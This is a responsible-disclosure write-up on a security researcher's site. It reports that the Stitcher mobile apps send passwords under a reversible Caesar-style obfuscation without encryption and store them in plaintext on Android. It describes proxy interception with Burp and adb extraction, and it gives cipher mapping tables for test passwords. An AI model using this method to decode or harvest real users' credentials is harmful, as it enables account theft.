Stitcher Mobile Apps Obfuscate Passwords with Caesar Cipher

Summary

Stitcher is in PC Magzine's 100 Best Android Apps of 2015 (see page 3).

However, the Stitcher Android and iOS apps have a serious security problem--they send login credentials without encryption. Instead, they obfuscate passwords with a modified Caesar cipher, a technique that is trivial to reverse.

This practice may be illegal in the USA. Two American companies were sanctioned by the FTC in 2014 for making a much less serious error, using HTTPS encryption without validating the certificate:

FTC Final Orders with Fandango and Credit Karma Provide Guidance on Mobile App Security

The Stitcher Android app also stores confidential data in plaintext on the Android device, as detailed below.

Testing Method: Android

I have Burp set up as a proxy for my Genymotion Android emulator.

Here's the app:

Sending test credentials:

Harvesting them from Burp:

The email is sent in plaintext, but the password is obfuscated with a very simple Caesar chiper, that moves each character a different number of steps forward in the alphabet, and inserts a padding character before it. The pattern is obvious from the test cases shown below.

Password epx

a sn

b so

c sp

d sq

e sr

aa sn5k

ab sn5l

ac sn5m

ad sn5n

ae sn5o

aaa sn5k4l

aab sn5k4m

aac sn5k4n

Password	epx
a	sn
b	so
c	sp
d	sq
e	sr
aa	sn5k
ab	sn5l
ac	sn5m
ad	sn5n
ae	sn5o
aaa	sn5k4l
aab	sn5k4m
aac	sn5k4n

Testing Method: iOS App

I used a MacBook Air, set up as an SSL auditing proxy as explained here:

https://samsclass.info/128/proj/MacBurpWifi.htm

Here's the app:

Sending test credentials:

Harvesting them with Burp:

Password epx

a _F

b _G

aa _FLx

ab _FLy

ac _FLz

ad _FL0

aaa _FLx-4

aab _FLx-5

aac _FLx-6

aaaa _FLx-474

A 9F

B 9G

C 9H

1 8F

2 8G

11 8FIx

aaaaaaaa _FLx-474zD3D4u6E

bbbbbbbb _GLy-575zE3E4v6F

Password	epx
a	_F
b	_G
aa	_FLx
ab	_FLy
ac	_FLz
ad	_FL0
aaa	_FLx-4
aab	_FLx-5
aac	_FLx-6
aaaa	_FLx-474
A	9F
B	9G
C	9H
1	8F
2	8G
11	8FIx
aaaaaaaa	_FLx-474zD3D4u6E
bbbbbbbb	_GLy-575zE3E4v6F

Notification

I sent this message on 6-20-15:

Insecure Local Data Storage

It's 7-28-15 and I have heard nothing further from Stitcher, so I decided to publish this, along with this less severe problem I found later.

I registered an account on my Android device using a password of FLAPPY-PASSWORD:

I used adb to pull the local data from the app's folder to my local Mac system:

Grep easily finds the locally stored password:

That file contains the plaintext email address and password, and, bizarrely, also contains the obfuscated password:

This is a poor security practice, because anyone who steals an unencrypted phone can recover the password.

Communicated privately to Stitcher 6-20-15 by Sam Bowne
Caesar Chiper added to title and link to FTC action added 7-1-15
Title changed, insecure local storage added, published publicly 7-28-15